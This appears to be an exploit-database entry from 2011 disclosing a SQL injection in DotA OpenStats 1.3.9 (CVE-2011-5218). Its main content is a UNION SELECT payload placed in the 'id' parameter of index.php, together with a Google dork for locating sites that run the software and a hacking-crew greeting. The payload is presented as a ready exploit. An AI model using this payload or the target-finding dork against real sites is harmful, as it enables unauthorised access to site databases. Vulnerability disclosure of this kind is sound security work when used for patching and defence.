DotA OpenStats 1.3.9 - SQL Injection

Author: HvM17
type: webapps
platform: php
port: 
date_added: 2011-12-19 
date_updated: 2011-12-19 
verified: 1 
codes: OSVDB-77944;CVE-2011-5218 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdotaOS-1.3.9.zip

=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit

		http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

============
Made IN INDONESIA
Greetz for All HVM crew :)
============